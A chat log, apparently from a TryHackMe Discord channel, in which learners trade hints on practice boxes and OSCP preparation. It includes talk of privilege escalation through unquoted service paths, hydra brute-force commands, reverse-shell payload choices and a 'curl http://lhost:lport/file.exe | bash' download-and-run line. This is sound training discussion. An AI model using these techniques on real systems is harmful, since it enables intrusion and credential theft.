#offensive-pentesting-path

then sessions -i 1 or whatever number session it created.

Metasploit is clunky

Can someone point me in the right direction on the Steel Mountain powershell command in Task 4? I’ve spent the better part of two hours trying to figure out what the box expects as an answer.

@rancid vine what is the issue ?

Honestly? I’m pulling my hair out trying to find the command the question wants.

it's been 3 days i'm stuck on this part #4

You mean the question about how to find manually the services ?

I assume it's finding the process command?

I was quite cruel with this one

that is actually not that bad

i got it right

Thought it would be a nice change for people

@final vault i read some article about the unquoted service path because you told me earlier that I didn't understand the exploit . thank you for that

I now have a better understanding of what is actually going on

😄

however .... 🙂

when im launching my msfvenom advanced.exe exploit

sc stop

nothing happens

sc start

yes

You stop the process

yes i did

then restart it with the same name I assume?

yes, i restart the process sc start AdvancedSystemCareService9

so I pulled my .exe with a powershell -c wget .... commands

got my Advanced.exe in the current folder

then I stopped the process and started it again

but im still on the same user || Bill ||

what directory are you putting advanced in?

Yea, the powershell -c

I can’t figure out what the correct fill in the blank is to save my life.

i put it in C:\Program Files (x86)\IObit\Advanced System\

nope

one directory back

i also tried IObit

because Advanced system isn't quoted

so it should be

according to the reading I did

C:\Program Files (x86)\IObit\ "Advanced System"

okay i don't get it

you mean I have to put my .exe in

\IObit\

?

yeah

So i did some reading and I put it then in C:\program files (x86)\IOBIT\

when I put it there, and I restarted the service it says that it can't restart the service because the directory or file corruted

because advanced system isn't quoted

it will run advanced before it goes into the directory

meaning you can take over

okay because indeed the system is trying c:\ first

and then c:\program files ... and so on

right ?

no

alright, so before going back to reading

last thing

why when I put my Advanced.exe file to \IObit\ and I restart the service, it tells me that the file or directory is corrupted or unreadable ?

Read up on exploiting unquoted paths and it'll make sense

okay

got it, thanks

Anywhere I can read up on finding your naughty powershell command? 😜

Just read up on finding processes using powershell

@rancid vine for that question I just google "how to see proceses running powershell command"

Yea I imagine I’ve just been looking at it from the wrong perspective. Thanks guys.

yes I think so 🙂

I've got nothing. Everything points to get-process which isn't accepted

@rancid vine Google search : powershell command to see service name ,

first link

I think I must have fat fingered once before or forgot a dash on that one because I have it written down as trying it. Thank you.

it happened to me for a room few weeks ago

alright so now you are at the same step as me

im struggling quite a lot 🙂 good luck

mann i can't make it work

crazy

i'm missing a little thing and I don't get it

@hazy ruin Are you stuck at exploiting the unquoted path?

@coral snow can I dm you for review of my hydra cmd for hackpark please?

@coral snow yeah I'm stuck. I put my advanced.exe file on \IOBit\ folder but I'm missing something because when Im stoping / restarting the service , I got a a message saying " file or directory corrupted and unreadable " . ..

Anyone able to help me with this very annoying flag?

I've terminated and redeployed Alfred 3 times now and got root again 3 times (twice via the intended method and once via just using getsystem on Metasploit) and every time I get to root, there's no root.txt in the expected directory?

Nvm I'm a dickhead.

Can I dm someone's who finished the steel mountain please ? 4 days I'm suck at task 4

Did some reading on unquoted path exploit but I can't make it work still

@gritty hollow Yeah sure

@hazy ruin can I DM you?

HackPark, Task 4 question 5. The hint says there is a public writeup on exploit db. I got root without finding any writeup, but the way I identified the service and binary was by entering it into the answer boxes. Could someone tell me (or DM me) the process for finding this write up on exploit db?

@hazy ruin did you get sorted out?

@rancid vine yeah finally ..

Was good though, through it I learnt a lot of new things

Hi, can anyone PM me on steel mountain ? ( rooted it, but can't find correct answer to question .

and looking for the correct answer on

@fierce kettle it may be happening because the site is under maintanance?

strange ( it looks like me question related , because other questions then these 2 , i can submit correctly)

well i cant say surely coz i havent done anything like those

@fierce kettle wait, you can access the website?

yes i can

look closely at the info on the website to provide the answer and not nmap @fierce kettle

can i pm someone directly , so i can send screendump of site directly ?

you can pm me yes

I find the answers and questions to be distracting, and sometimes they are misleading. Hints and flags should be enough.

agreed - BUT have also pointed out to me that sometimes we enumerate and do not look at all the detail in front of us.

Wondering if anyone can help me with the hydra command for HackPark?

Tried command ||hydra -l admin -P /usr/share/wordlists/rockyou.txt http://10.10.144.170/Account/login.aspx http-post-form|| but it's just erroring with error: ||Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-17 11:35:33 [ERROR] Invalid target definition! [ERROR] Either you use "www.example.com module [optional-module-parameters]" *or* you use the "module://www.example.com/optional-module-parameters" syntax!||

hello

@fleet wedge man hydra or google hydra syntax

oki

You guys simple attack, root and capture the flag or you read the task and writup?

How you study here actually? I just subscribed yesterday!

@ancient locust I usually start the room and see what it is about. Then I read up on whichever area I lack sufficient knowledge on.

Also interesting to read writeups or talk to other members on how they solved afterwards. Often there are small differences in the approach.

@coral snow I see in tasklist tryhackme ask for some answer. Sometime i can't understand the question but i know the answer since i passed the task. Should i really input the answer to track my progress?

And you only talk here and i can join to chat somewhere else?

Pretty new myself, started a couple of days ago. So not sure about other channels of communication (except ones listed under social on the site).

I guess you have to answer the questions to get 100% progress.

I can capture the flags but sometime my answer does not match. And i am trying to avoid msf all the way

@coral snow Is there any guide in tryhackme?

guide? Only the tasks I think. You could check the forums as well. People have probably written writeups as well, but those often don't explain the process very nicely.

The flags should be straight forward to just paste into the answer boxes. But I agree that the othen questions and answers can be misleading.

I have got two machine but none of them are 100% completed. Because some questions are missleading

can anyone make skynet room video, am confused at some step 🙂

Question fortryhackme admins , is it allowed /or not allowed to make writeups of tryhackme machines , and publish them on my own site ( if yes do they need to be root.flag restricted or not )

hide root.flag, it is best thing 🙂

Perhaps disclosing last few bytes should not harm

"Take a look at the other web server. What file server is running?" A file server could run on same port where the http or https is running?

@ancient locust That one is a pain, and in my opinion misleading. I can DM you the answer

We welcome writeups of rooms @fierce kettle (I'm not an admin) but as long as there are no flags and/or passwords within them, you're more then encouraged to submit a writeup from your site 🙂

You have it correct, but they expect a funky version of it

@coral snow What i know is a server use it's own port. 😦 . I might be wrong! It makes me confused

which question are you struggling with?

nvm

Can I DM you? Give a hint

@coral snow Sure! Check you dm

Thanks, just to be sure , i protect them with root.txt of box https://www.puckiestyle.nl/thm-steelmountain-nl/ until i have an admin answer.

@fierce kettle puckie is your real name? I want to start a blog. Thinking if "rootpwd" is a good name for my blog or it looks funky

🙂

What a beautiful language you have in Netherlands xD

puckie is the name of my dog

🙂

@fleet wedge you turned off DM so I couldn't offer help

But the basic gist is that it is an incomplete command

@obtuse scaffold please don't try to DM people unless they've given express permission 🙂

anyone else having issues getting Alfred to come online?

If you're trying to ping it, chances are that you're running into the windows firewall

Which blocks ICMP by default

not pinging

just nmap

and gobuster

nmap pings first unless you use -Pn

I have no idea why Gobuster wouldn't be working

How's your VPN?

solid

I'll perform IT 101

and reboot

Well, that does the trick 🤷‍♂️ 😁

nope

so weird

there it goes

took forever for some reason

Hello boys and girls. I just came up with a question. Is blind SQL injection/mapping part of OSCP? And since you don't have access to SQLmap supposed to build the tools to automate extraction yourself? I just spend 2 days scripting the shape of the DB in lordoftheroot.

Anyone of you done HackPark machine?

@ancient locust I din couple of weeks ago.

@scenic glen Need a little help. May i pm you please?

Just finished it myself a day or two ago

HackPark I don't get it

the service name

• .exe

punched in everything .exe that seems long enough from ps metasploit

nothing comes up

Have you already rooted?

no but think i have found the admin pw

so bad at windows lol

recon exploit sug didn't work

Think all i used for this box was winPEAS

got winPEAS working.

reading thought it

is there su for windows?

you can use powershell to do it

the normal way in cmd doesnt work AFAIK

there is a way to run commands as another user

but no su in cmd makes me sad

you definitely can run as another in powershell

but i think the intended way that the website tells you to do will be slightly easier than it

I can pm you the runas command for powershell if you like

I don't know what to do after you get a reverse shell as the web user

within metasploit

I waited to long. I don't like hackpark

bash your head at google just to realize you machine shell died even though the machine is still up

AAAAAAHHHHH

my shell only died when i was trying out the kernel exploits ^^

didnt manage to get any of them to work though

It just randomly dies

can't reconnect anything

without reseting

resetting

hmm I had the same but thought it was because of my own actions (like messing with servies etc.)

maybe its just the box lol

@final vault !!!!!

here is the powershell command for running commands as another user anyway

maybe there is a more elegant way but i dont know it

@obtuse scaffold so your saying just create another nc listener as the user you find...

really would like to figure out how to priv exec without creds

well you open up a shell as the user you are impersonating

winPEAS has it i believe

lets do it all again...

study anything in red

and google around the stuff in red til it looks like something is there

got winPEAS to work

@obtuse scaffold is there anyway to do wget like powershell with cmd?

https://github.com/russweir/OSCP-cheatsheet/blob/master/File Transfer.md

or run scripts without installing them like with linux
curl http://lhost:lport/file.exe | bash

will check that out

https://forums.hak5.org/topic/41729-running-powershell-in-memory/

this might be what you mean, not sure though

Just the first result on google

ok ok ok good stuff

more reading

I dont think anything will block you on these boxes though

but you will definitely see it on the harder boxes on htb so good to know about it

why am I being pinged?

there are more things I would learn before HTB @obtuse scaffold

also the lag of HTB free is making me wait longer to resub again

Can i dm someone who escalated HackPark machine or i should post my questions here?

need some help

hmm, i am being ignored!

sorry in a meeting

@ancient locust

am working on that one to as well

ah.... I have shell

i have a shell making stuff to get the admin shell

will ping you if I solved it

to help

Thank you

I have done it, but better you work together, more fun 🙂

@coral snow thanks for that wink... jk it's all good

hehe.. Just saying in case you get completely stuck

@coral snow some hints might be fine

@coral snow no hints for me I think I know what to do. Well what I want to do

@coral snow would like to get a exploit to work though after this method

someone explain my stupidity here

in Hackpark, they ask which RCE cve that is used

the one I used is "wrong"

@maiden vapor which one did you use?

2019-6714

@maiden vapor may I DM you?

yep!

@coral snow Ok i give up can i DM you

or anyone for HACKPARK

help

Is anyone else getting constantly timed out trying to connect to smb shares on skynet?

@brittle needle for the first part or after you get creds?

or just in general?

It’s just in general for this room. I already have the creds but the connectivity issues with the room is preventing me from progressing.

@short jacinth DId you complete HackPark?

tryhackme machine suddenly goes down, some machine does not come only even after 5 minute of start. Time out!

Anyone able to DM me for a bit of help with Hackpark more so getting the Hydra aspect of it working, video tutorials I'm struggling with understanding it so a few questions would be majorly appreciated.

@fleet wedge You got hydra working?

that's what I'm trying to figure out @ancient locust cause either I'm doing it wrong or the password lists I've been using are shit.

dm me if you need help for hackpark

just pm me your command and i'll see whats up with it

i need help with brainpan

@ancient locust stuck on the priv exec part

@short jacinth the machine always goes down suddenly. Doest it happen for you too?

ya

it's unstable for some resason

did you get your hydra to work?

@short jacinth Too unstable. I did not try the hydra anymore. Just used burp. I stopped working for this machine since most of the time it is going down after 20-40 minutes. And i was not able to find the vulnerable service binary. Someone said there is a but i don't see anything interesting

which machine? hackpark?

UA

ya

i cant recall it going down by itself

yeah

So how?

there was one room tho that i had to restart as to much enumeration made it return false values for everything

but after a terminate&redeploy the enumeration worked if i didnt do it as aggressively

@ancient locust trying the brute force part again

@short jacinth Try with all post request

worked with a shorter list trying with rockyou.txt again

try seclist/common-passwords/10k

it worked both times

Thats good

May i see the command? in DM?

ya just dm you

did you get it?

powershell -c "Get-Service"
@final vault Thanks, was going nuts with this question.

❤️

Game Zone really should have a no-sqlmap task

sqlmap is not allowed in OSCP exam

Kind of defeats the point of the room

The OSCP rooms are all in the process of being updated to include manual sections 🙂

awesome muir 🙂

Thank optional 😄

what is task 4 question 3 on hackpark no idea what I'm looking for

@short jacinth Probably what you think, but add ".exe"

This is the last box I need to complete for OSCP learning. Can someone help me on which dictionary to use for “jack”

The pre-eminent expert on Jack is away just now I'm afraid

?

@fleet wedge The word list you need is installed by default on Kali

@short jacinth any progress on finding the abnormal service ? I've rooted the box but the service name im putting in there keeps saying wrong answer

@fleet wedge check out isroot.nl the article there makes the learning process relatable. Thank me later

@violet shore i have everything i am just stuck at the msfvenom payload

I have read some articles

Looks like in vulnhub its running on windows

Whereas tryhackme runs linux

I tried both payloads nothing seems to work

not sure why it's down right now http://shell-storm.org/shellcode/

but this just has a bunch of shellcode for your bof exploit

ino i got it

thanx anyways coaran 🙂

privesc was quite easy

initial shell took me a while never actually generated one for linux machines most of the times nc , python ,php etc did the trick

has anyone complete the manual exploitation of "Steel Mountain"?

@fleet wedge were you able to get shell without meterpreter, couldn't get normal reverse_shell payload to stick

only worked through meterpreter payload for me

@obtuse scaffold i am in oscp path i dont use meterpreter or metasploit

also yes i did it without it

@violet shore HackPark I have thrown winPEAS, JAWS, tasklist, schtask, get-process, and Get-ScheduledTask not sure what .exe string I'm looking for

feel like for windows manual process enum would be useful

oh wow got it... hackpark done

reEEEEE

Is this a good prep for oscp

I love the platform so now im ready for a new path

@neat socket I have done 3 machines. There is a bit much focus on automated tools like metasploit and sqlmap. OSCP is more manual, modification of exploits etc.

That said it certainly gives a taste of the PWK labs, and I am having fun.

No one is forcing you to use metasploit and sqlmap

Nope, but one would lile to follow the room tasks, isn't that part of it? Not saying you cant just ignore the tasks and root it, but it would be nice if the tasks focused more on manually exploiting.

If you have to follow the room task to root the box, than you should not be taking the OSCP exam

The PWK is also way easier than those boxes (or some of them)

Then whats the point of the tasks?

I didn't make the task so don't ask me

I'm just being 100% real about the OSCP exam, and those task should be avoided if you're practicing for the exam

I'm just weighing in on @Syscoin_long s question. And I agree, I don't like the tasks either. The machines are ok though

Certain machines may or may not be based on the very thing you expect from the path

@alpine peak May I DM you?

sure

@alpine peak is it Ok to DM you questions about hackpark?

Sure

Did anyone manage to get the chatserver.exe running locally? been trying to get it to run on a windows vm with no luck, not sure what im missing

@obtuse scaffold did you include the dll?

Not sure how to, I just have both the files and was trying to run the exe ^_^

Is there anyone who can help me with a nudge for “Jack”?

What dictionary do I use

@fleet wedge The word-list you need is installed by default on Kali.
Can't tell you which one as that will be a spoiler.

@noble glacier I tried rockyou but it’s going to take 10 hours

That, I'm afraid, doesn't hold much incentive for spoiling it 🙂
Everyone has the same challenges -- it's part of the box. We can't just give out spoilers to everyone who asks, now, can we?
The help channels are for helping people to understand things that they haven't quite got yet. Telling you which wordlist to use doesn't really fall into that.

Let’s give a great hint. Use fast track

Or whatever it’s called

can someone check what i am doing wrong with Steel Mountain?

can i discuss question in puclic or should i try to find someone that can reply directly?

@night spade whats the issue you are facing?

it was pretty hard to submit a webserver name, the same for CVE number

but end of the day it seems like it matches with metasploit module description

Not sure what you mean honestly.

I'm going to livestream the box in a couple hours for anyone who wants to see.

so question was:

Take a look at the other web server. What file server is running?

first i was trying name from the footer at that index page, then name without version number, name from official web page of that webserver, name from CVE list

but at the end it was a name without spaces

no, actually it was with spaces

but with that vendor or whatever in front

I mean, this one is fairly straight forward. You can search the name of the web server and it tells you exactly what it is. Typing it in exactly as it is in Google shows the specific exploit you'll use.

of course, i had to use title from exploit-db

am i blind? Take a look at the CanRestart option i dont see anything related to that

fixed it. haad to redownload script and reupload

is there a reason why the root shell dies instantly for steelmountain using metasploit?

Never had that issue.

for some reason even after i extend the machine by an hour, as soon as it hits 58 mins, it dies

it was at 1.5 hours, just hit 58 mins and connection died

can someone give me a tip on winpeas? it just hangs in the terminal and doesnt do anything

Hangs how? Like you run it and it doesn't fire off?

yea

ill have to go back to it at some point and check it again. i tried the obfusated and reg ones

ended up having to back out of the shell and try again

hey

hey

i have a probelm getting the exploit to work on steele mountain and it says complete but no session was made. Has anyone experience this?

You have to cuss at it

Don't let it smell fear or it will fail

It senses it

@plucky jewel

Hey! Sparkle are you having the same problem with Steel Mountain [task 2] using Metasploit to access the Machine???

I've trying all day trying to gain access

z

only issue i had with steelmountain was winpeas

How could I find out how the meterpreter upload function works?

Like the actual code behind it.

Is there a trick to saving burpsuite results to a text file to use with sqlmap? It keeps telling me its an invalid format of a request file

This is for the gamezone room

i find just copy and pasting the text maually into a file.req works best. and then removing all the empty lines except one seperating params

works best for me

Removing the spaces seemed to do the trick thanks a ton

https://tryhackme.com/room/hackpark task#2 , when you get 1 of 1 target succesfully completed, 16 valid passwords found from Hydra, that means there is a mistake in my command, right ?

Whatever the wordlist I'm using, I'm getting this 16 valid password found

Message

Okay I think I'm on to something hold on ...

Lol

Finally got it!

took me 5h ...

🙂

hello, Anybody did exploit with metasploit on GameZone?

It is Task-6, I failed to create a session on metaasploit.

Or you know

Answer them yourself. If you’ve rooted stop being lazy, run the script and find the answers...

I'm having the same issue bbakbbak2, I cant seem to find any manual exploit examples on the internet

The issue seems to be with the authentication, its a little fucky because of needing to use an ssh tunnel to reach the webmin panel in the first place im sure

Okay slight progress, if you set the ssl option to false it tells me it authenticates successfully and creates a meterpreter session but it instantly background it and if I try to go to the session it dies

Guess its time to do the metasploit room :b

see if that helps

anyone know how i can change the administrator password for the admin account where it's current password is expired from a lower priv account. Where i have the current password

(for the expired admin)

commandline ideally

done it 🙂

Hello people, I have a problem with Brainstorm.
I have created the exploit in my Windows XP VM and it worked perfectly. When I launched it into the Brainstorm machine it was not working.
After doing some research, I checked the writeup and realized that the user of the writeup was sending 1002 letters A to get to EIP, in my case, I was sending 6102 A
Do you know why the offset is different?
With 1002 it worked perfectly
Thanks in advance, I await your response

Do I have to use a Microsoft Windows 7 Ultimate VM?

Would anyone be interested in a live stream of something like Steel Mountain? I know I see folks having trouble with it.

is there a better wordlist for use with gobuster on the first task? gobuster seems to be taking forever

@twilit valve I usually start with this list and use 100 threads gobuster dir -u (target)/ -wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

@timid crow you're right. but i want to know what problom is... it will make me crazy if i come across the same situation.😫

i wish the man who solved the room appears

Question on hackpark What is the name of the abnormal service running? can't figure out the correct question ( i know it's C:\Program Files (x86)\SystemScheduler> and M***.exe is the next question)

@fierce kettle if you have a shell couldn’t you just go to that directory and look?

I have now thanks it was , W**********.exe ( it was case sensitive the answer )

@simple loom may i pm you for a question Using winPeas, what was the Original Install time? (is this for the dir or the W.exe file and need the , in the accepted answer ?)

I had issue with that Q, try 'systeminfo' in a standard cmd shell

@cosminthrill amazing thanks , if you need info an any htb machine, you may pm me, i can help you 👍

@fierce kettle you're most welcome. An extra challenge in some rooms is trying to find the exact answer format! 😉

Does anyone have any recommended resources that might explain how to exploit SQL injection manually? I am working through Game Zone and can use SQLMap tool easily but I don't understand how it is working

@cloud flicker Try using sqlmap with burp suite.

you can intercept sqlmap with burp?

sqlmap <whatever> --proxy=http://127.0.0.1:8080

(it looks like there's some add-on but I just wanted to look fast, hahah)

oh that makes sense, nice!

anyone did the bof machine?

The brainstorm?

no one talk

tackling it now rootpwd, ill let you know how it goes

@timid crow I got the root

But i can't answer a question

how many ports are open

@ancient locust scan the machine with nmap to see that

@bronze zenith Yep.... Did it , and it always say wrong

did you scan all of them

I counted how many ports are open.... if 3 ports open i answered 3

yes

and it always say 'wrong'

@bronze zenith Can you please check it?

@ancient locust what room is that

Brainstorm

okay i'll check it

nmap command: nmap -v -p- -T4 -Pn ip

Daily Bugle.. I am getting rev shell as apache. Any vague hints on pivoting?

Try linpeas

linpeas.sh

nmap command: nmap -v -p- -T4 -Pn ip
@ancient locust but that's not all the ports

i am checking wait a bit

I am scanning again... But this time, it is too slow

@ancient locust idk i also got 3

and the writeup only talks about 3 too

@bronze zenith So there is something wrong with test of the answer

but it's a medium level room

I got root flag

maybe there's another way

this box supposed to be realistic since it is listed in oscp learning path. I don't think the port is hidden.

@bronze zenith Guessing worked! And the answer practically totally wrong

yeah i guess

@ancient locust That did it, thanks. Was not aware of linpeas

@coral snow 🙂 . Got the root too?

||is it intended to use migrate to privesc in Jenkins?||

@ancient locust More or less, know the route 🙂

@coral snow these machine are easier than hackpark,vulnersity

@ancient locust Vulnersity is part of oscp path?

@coral snow Yes

as easy machine

but daily bugle is easier than Vulnersity?

and Vulnersity is easy, so daily bugle is... super easy?

@ancient locust It is rated hard, though

Buffer overflow machine is more easy

I am still struggling with hackpark

These questions and answer killing me lol. I was able to exploit with a CVE listed vulnerability and here it say, my ans is wrong

apt-get install python-pip

No package in Kali?

On the GameZone machine Task5 says it is possible to confirm that a service is blocked by the machine#s firewall using iptables but when running iptables -L I get a permission denied error.

@ancient locust Aaaaand rooted, thanks! 🙂

congrats

@rancid vine yes

giving up working with hackpark. Very unstable machine

😦

This machine don't like me at all

@ancient locust I'm unable to complete it too, I think it is bugged to where it dies after an hour even if you extend the time. Just becomes totally unresponsive. I think admins are looking into it

@cloud flicker I tried with vulnerablesity, when i fuzzed the file it become unresponsive

I've tried multiple times at different speeds and it seems to just die after a certain amount of time as opposed to any specific activity

So it's not just me then. That's good.

Yeah I’m having trouble complete hackpark due to the instability

whats up with hackpark? im on the priv esc part atm

oh the time extension..yea its extremely annoying lol

anyone having issues with windows exploit suggestor? i update the database, updated xlrd and both show its been updated. then the script says please update lol

oh man i feel so stupid haha.. just spent like 45 minutes on DailyBugle ||as the wrong user for priv esc||

@undone jacinth May I DM you?

maybe someone can give me hint to task 4 second question at "Steel Mountain" room? There is a question about powershell command.

I had some issue with that myself @night spade try googling "powershell commands to show running services" and doing a little reading. The first part of the answer is already there for you in the question 🙂

Feel free to pm me if you are still lost

ooh, got it, thanks

hello

Having trouble getting started on Brainstorm, can't seem to get ftp to play nice for some reason

Been bashing my head against the wall on this one and Im sure its super simple any help is appreciated

I'm pretty sure you should just be able to search the filesystem on ftp

maybe try reset

I'm stuck trying to transfer the reverse shell into hackpark. I've tried three different ways of doing it.

@brittle needle im at the same step. did you try uploading the exploit through the same process as the first one ?

@brittle needle @hazy ruin ||think about how an authenticated user could upload things onto a blog page, like updating an image on an existing post or on a new post||

I did it, it worked yay 🙂

MSF is quite clunky tho, I was doing the same yesterday night, and I was struggling to get my listener from MSF

Yeah msf is a bit iffy on this box, I actually did manual only on this box. Better for oscp prep that way anyways :b

yeah I should do that next time

I take my test tuesday, probs wont pass the first try but Im looking forward to seeing what the exam is like and getting a shell or two 🙂

btw im currently tyring to privesc on the machine ( hackpark )

Can I use the command wmic ................... . . . .

or is it only for unquoted path purposes ?

I didnt use that one personally

you're on the right track with unqouted path though

okay

Hi, i need help for authenticating blogengine

Same like hackpark

Password is breaked, but when entering it is showing something like ‘oops, developer caused this issue, appolgies, 20lashes to him vlah blah’

Is anyone can helped me regarding this

which room @crude shale ?

I'm still stuck at hackpark question task#4. I found the abnormal service || WindowsScheduler || however I was pretty sure that I need to exploit something with || WSservice.exe || however it is not the right answer. I launched some other scripts I have and all are pointing to the same .exe . where should I look at ?

I mean, the hint is talking about || log files || , I checked it from || c:\program files (x86)\SystemScheduler\logfile.txt and logfileadvanced.txt || but didnt find anything special

@hazy ruin you're on the right path with the idea of scheduling. Take a look at running processes using "tasklist" several times. do you notice any programs that runs every minute or so?

Thanks, just did tasklist, how do I know how often a task is running ?

You said " to run it several times" okay got it

thank you,

Got it right now

yay 🙂

just look at time logs @hazy ruin

logs too ^

and happy to help 🙂

Found it I'm good now 👍

Why do I get authentication error when doing ||smb||map in Skynet?

I had similar issues @fleet wedge

I had issues using smbclient as well

but there is no way to get abnormal service name for third question in process list, right?

for HackPark? @night spade

yes

because i was not able to get the exe from process list and i just listed services

I mean.. it's intended to use WinPeas

and then just added .exe to the name running

yeah you are supposed to add exe

processes are usually displayed without an extension

just a name

but as I understand that is just a service name, process have a different name which can be seen in process list

am I wrong and there actually is that {servicename}.exe somewhere?

you need a service yes

you can rather list processes or run WinPeas (which is better)

Yes, you should use winpeas

also the next task asks you to use it

@timid crow how'd you fix it?

May someone help me in Skynet, I actually don't know how to upload the shell :/, kinda don't understand what the exploit description says, went trough passwd and configuration.php but, what else?

are there any video demonstrating buffer overflows room?

im a bit of a n00b wit this...

I'm going through a bufferoverflow right now in cod caper

it's very descriptive and helpful, this is my first time trying a bof

Trying to do buffer overflow room

Cod caper has buffer overflow?

Yes @stable geode

As the person who made the room

I'm gonna do it today, woot!

I can comfortably say it does

You should've told me that before :(

I told you I'm the creator of like half this sites RE content

Which is pretty sad tbh

Why?

Because there's not enough re content

True that.

Robin this is your area

My room is 90% complete though.

Make some rooms!

Yeah, surely will.

hey guys, sat the OSCP yday. anyone sat it recently? what are the turn around times on exam results with 'rona?

no idea on results but one of our members is doing an exam right now

@final vault :s

oooo, good luck!

hes gonna smash it

#believe

Okay Im losing my mind here. Brainstorm room ftp is just not letting me pass any arguments, consistently getting "501 Server cannot accept argument" error

Any help at all is much appreciated

I'm gonna start it later

let me know if you have similar issues

Sure :)

Anyone have an issue running the Invoke-Kerberoast.ps1 on corp?

Nvm, forgot to import it

@timid crow hey im in brainstorm now, what was your problem about?

I couldnt get ftp to cooperatee

did anon login and that would be fine but wouldnt let me list contents or do anything other than change binary mode or go to passive

Just did brainpan though so I still got some BOF practice 🙂

well it works for me actually

well thats good! Ill give it another try later need a break after brainpan

like I said before Im sure its something super simple im missing but its frustrating when its the super simple aspect thats tripping me up and not the actual buffer overflow lol

Does it say the system cannot find the file specified? @timid crow

yes that was one of the errors

i managed to solve it, just do cd into the directory it says and youll find both @timid crow

Has OSCP always allowed msfvenom and exploit/multi/handler on the exam

Thought they were included in the "once per exam" restriction

@undone jacinth You're allowed to use msfvenom and multi/handler as many times as you like in the OSCP exam.

nice

the key thing to note with the exam

you can't use staged payloads

just started lab access for the second time. already rooted more boxes than my entire lab time previously 🙂

for windows it's a good idea to use windows/shell_reverse_tcp

you can tell whether a payload is staged by running msfvenom --list payloads | grep windows/linux

do you even need multi/handler for stageless though

Nope

It can be used if you like the feel

it's just inefficient compared to catching it on nc

anyone done lord of root without sqlmap

^

would love some help with that myself

@fleet wedge what rooms should I do to prepare for Brain Storm oscp room.

I can't find any write ups for brain storm or buffer overflow room so struggling quite a bit with radare2

What the remote IP (RHOST) for the OSCP path

@fleet wedge what rooms should I do to prepare for Brain Storm oscp room.
@stray lynx There's a Brainstorm writeup published on the room page

Thanks @cloud flicker I swear that wasn't there the other day 👍

You're welcome! I'm learning about BOF right now using this https://github.com/justinsteven/dostackbufferoverflowgood and it's very good at explaining it all!

Means I can save the two BOF rooms as an actual challenge, too

Thank you 😊

What the remote IP (RHOST) for the OSCP path

@hollow wraith what do you mean? Each room has it's own IP after you deploy the machine

Im using my machine IP and Enternal Blue on metasploit is not working

Go to the page of the room you are working on, and make sure the machine is deployed (in Task 1). It should show you the IP address and how long you have left

The exploit was sent, the log is saying that your target is not vulnerable.

then what the purpose of the lab

Try using forceexploit true as it suggests

I figured it out each room has a new VM deployment

What does OSCP path contain?
Does the machines have hints in the Oscp path?

What does OSCP path contain?
Does the machines have hints in the Oscp path?
OSCP path contains OSCP alike boxes.
some of them contain hints yes, but some not

Can confirm the oscp path contains pretty decent boxes tbh

@final vault Exam over?

yes

cool!

everyone saying results will be in 5 days.. hopefully he will clap it

it may delay upto two weeks(as i heard of) due to the current situation going on

may be not sure

10 business days

Was on my submission email

ohk

Is it harder than tryhackme oscp path

of course it is

but i think with practice you can do it

Honestly yes and no, the exam isn't as bad as it's made out to be. PWK is harder I'd argue due to the large number of active directory on there

Hello my fellow hackers, I rooted SteelMountain already, but I just couldn't figure out the question under Task 4. Can anyone enlighten me a bit?

#room-help

@dense citrus

thank you sir, im new here, so apologies for posting that..

np

@fleet wedge Yep I Truly agree with that

💯 💯 💯 💯

Anyone preping for ecppt here? What path are you doing from tryhackme as prep?

I would look at Kenobi, the XSS room, Blue, and maybe Linux privesc. Being as eCPPT actually requires pivoting you’ll want to go through the lab in PTP that covers proxychains a few times.

Also the BOF rooms wouldn’t hurt.

PTP has a price issue for me

So does the unequally expensive OSCP. I paid less for eCPPT than I did OSCP.

¯_(ツ)_/¯

And I learned a boatload more.

I paid a grand for PTP. I paid $1349 for PWK/OSCP.

how @rancid vine even with the discount code from TCM still costs me $1.4k

ELS regularly gives discounts that make their content pretty affordable. In this case I bought it on Black Friday, which gave me 25% off and a free upgrade from full to elite.

Think I paid $1,099 in total for it. I actually paid less for PTP and PTS than I did for PWK/OSCP.

Can I DM a mod really quick?

@rancid vine sure

I'm in the US, so I didn't have to pay VAT fortunately.

damn it

Hey everyone! At 1pm EST I'll be livestreaming Steel Mountain and covering both the Metasploit exploitation as well as the manual exploitation. You can check it out here. https://www.twitch.tv/themayor11

oh, alright, sorry for that then

No worries.

just enforcing the rules, don't mind me 😦

I know. No hard feelings.

thanks for the understanding

As a reminder I'll be streaming Steel Mountain in 10 minutes at the link above. Hope to see everyone there.

Thanks everyone who stopped by. Hopefully the stream helped!

Starting my oscp class on june 21st!

So I managed to break boilerctf by sshing to some machine under the machine and now the page I needed doesn't work any more 😄 Now this is an easy fix. Just start another machine. But what if I do this in the exam?

Just got the email through

I'm now an OSCP

Congrats man !! 🥳🥳 @lusty epoch

congrats

thank you ❤️

ask a mod for the title in #general

Congracheulashions ❤️

It happend to me 2 days ago when I broke a certain file I was supposed to read from in catdog. Luckly the service uses 2 files and I had a backup. Here there isn't

i think you have the possibility of reseting the boxes

thank you all

no worries

Trying to do the steel mountain on oscp path

Cant figure out the powershell -c question

Can anyone help me?

google is your best bet.

Got it

Thanks

^^

Just got the email through
@lusty epoch do u have ceh?

Not yet, thats next on the list though 🙂

is there a reason for getting ceh at all?

@arctic wyvern Some employers look for it as part of their automated or manual application processes as it's still recognised as an 'essential' skillset in a lot of places. It's a requirement for recruitment and/or promotion at some levels in the DoD in the US. Most worthwhile cybersec recruiters will know the value of other certs and experience.

fair enough doesn't seem worthwhile otherwise. I know my employer thinks it's a joke and would prefer oscp,gpen,gwapt,cissp etc might still help as an HR filter thing but yea general consensus seems to be it's not worth the $ or time

Considering the reputation of oscp/gpen and even the eLearnSecurity crowd has been getting some recognition for their training/certs. Going on what I've heard I would put OSCP/GPEN higher

how good is this path?

it's good

Wondering if anyone can help me with Skynet? DM Me please 🙂

Why not here? @fleet wedge

I don't wanna give away spoilers @fleet wedge

oh okay

What's the problem you're having?

hey guys, I have a question more than help for room https://tryhackme.com/room/skynet , task#1 . I managed to get the answer pretty quickly with || burp || however, my first attempt was to do so through || hydra || instead with a || http-post-form || I coudn't get the answer as || hydra was telling me that every password were good || is there any of you that did it with || hydra || rather than || burp || ?

if hydra says its all good

then you haven't specified what a wrong request looks like

yeah that's what I was thinking.

on the http-post-form i think it looks like page.php:USER-PASSWORD:incorrect value

so if it says "invalid password" in the response

however the wrong the request was giving me " unknown user or password incorrect"

you would do page.php:USER-PASSWORD:invalid password

so I put at the end ":unknown user or password incorrect"

but was getting the same issue

but i must do something wrong

you can just put password incorrect

